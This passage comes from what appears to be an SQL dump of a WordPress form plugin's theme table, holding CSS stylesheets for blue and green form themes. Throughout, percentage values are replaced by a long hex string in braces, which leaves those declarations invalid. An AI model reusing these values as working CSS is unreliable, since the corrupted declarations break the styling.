skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(17,'Theme 05 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #0E7297;\r\nborder: 1px solid #A0CBDB;\r\nmargin-bottom: 10px;\r\ncolor: #A0CBDB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/01/nextbg_hover.png) url([SITE_ROOT]/images/05/01/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/01/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #A0CBDB;\r\n	padding:15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #006A91;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\ncolor: #3F3F3F;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #026994;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #006A91;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #01B4F6;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018ABE;\r\n	background: -moz-linear-gradient(left, #0079A6 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0079A6), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA ));\r\n	background: -webkit-linear-gradient(left, #0079A6 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(left, #0079A6 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -ms-linear-gradient(left, #0079A6 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: linear-gradient(to right, #0079A6 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018ABE 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00B6FA 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #C4D5DF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(18,'Theme 05 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #007326;\r\nborder: 1px solid #B6E4CF;\r\nmargin-bottom: 10px;\r\ncolor: #B6E4CF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/02/nextbg_hover.png) url([SITE_ROOT]/images/05/02/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	